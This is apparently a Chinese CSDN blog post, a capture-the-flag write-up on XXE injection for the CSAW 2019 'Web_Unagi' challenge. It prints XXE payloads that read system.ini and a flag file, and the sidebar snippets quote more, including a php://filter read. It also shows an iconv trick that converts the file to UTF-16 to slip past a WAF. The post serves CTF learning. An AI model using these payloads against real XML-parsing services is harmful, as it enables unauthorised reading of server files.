第一次研究的XXE

最新推荐文章于 2023-09-14 22:19:42 发布
最新推荐文章于 2023-09-14 22:19:42 发布
阅读量129 收藏
点赞数
分类专栏: 攻防世界web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_31884905/article/details/114550485
版权

XXE的原理解释

https://www.bilibili.com/video/BV1Hi4y147ew?from=search&seid=5986897573531513171

XXE payload

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]> 
<creds>&goodies;</creds>

解题

在这里插入图片描述

从信息提示我们可以知道要通过编写xml文件上传
即通过XXE编码转换成utf-16编码绕过

我们可以利用vim编辑xml文件(取名为2.xml)
构造payload如下:

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

发现有WAF。可以用编码绕过。

iconv -f utf8 -t utf16 1.xml -o 2.xml
iconv -f utf8 -t utf16 2.xml>1.xml
王俊凯迷妹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxe编码绕过(8-19)
Realiy的博客
08-19 1683
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
攻防世界web解题[进阶](六)
weixin_46703850的博客
03-10 591
攻防世界web解题[进阶](六)
XXE的理解与绕过
weixin_50464560的博客
11-30 1563
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
【WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 907
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XXE详解
洋洋的小黑屋
01-13 2658
XXE(XML外部实体注入),程序解析XML数据时候,同时解析了攻击者伪造的外部实体。 XML用途是为了跨平台语言传输数据。常常用于WEB开发等 XML格式规范 XML有自己的一个格式规范,由叫DTD的东西进行控制 DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在另外一个单独的文件中(外部...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
最新发布
09-15
XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
XXE超详细讲解 全网仅此一份
07-06
XXE(XML External Entity injection)是一种安全漏洞,它发生在解析XML输入时,由于应用程序未能正确处理外部实体,攻击者能够注入恶意的XML实体,从而读取服务器上的敏感文件、执行系统命令或探测内网资源。...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件读取、命令执行、甚至服务器控制...
XXE - 防御策略-01
09-15
XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 从 2018 年...
XXE攻击指南
rigous的博客
06-30 3530
现在许多不同的客户端技术,如web端,移动端,云端等使用XML向业务应用程序发送消息。为了使应用程序使用这些自定义的XML消息,应用程序必须去解析XML文档并检查格式是否正确。 本文将描述XML外部实体(XXE)注入攻击及其基础知识,以便更好地了解如何攻击以及如何处理。 既然我们将谈论XXE注入,那么首先我们应该了解外部实体的含义以及实现的内容。 外部实体是指XML处理器必须解析
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1920
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
XXE学习
qq_44657899的博客
09-13 379
文章目录CTFSHOW-XXEweb373 CTFSHOW-XXE web373
CTFSHOW xxe
羽的博客
01-11 3277
web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64
CTFshow——XXE
D.MIND 的博客
08-23 826
web373 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i
Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
weixin_36337122的博客
03-16 522
0x01 前言PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel、LibreOffic Calc等表格格式的文件,是PHPExcel的替代者。2018年11月13日,PhpSpreadsheet 被爆出存在XXE漏洞(CVE-2018-19277),在表格的解压文件中插入UTF-7编码的恶意xml payload,可绕过PhpSpreadsheet 库的安...
CTFshow XXE(web373-378)
Kradress的博客
03-18 534
post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
wanan的博客
09-30 610
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
XXE和XML利用和绕过
qq_49078152的博客
07-19 824
XXE和XML
XXE漏洞深度解析与实战演练
此外,文中还提到了一个VulnHub靶场XXE Lab:1的过关记录,适合对前后端有一定了解且想学习安全知识的人群。 一、XXE漏洞原理 XXE(XML External Entity)漏洞源于XML解析器允许定义和使用外部实体。攻击者通过提交...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值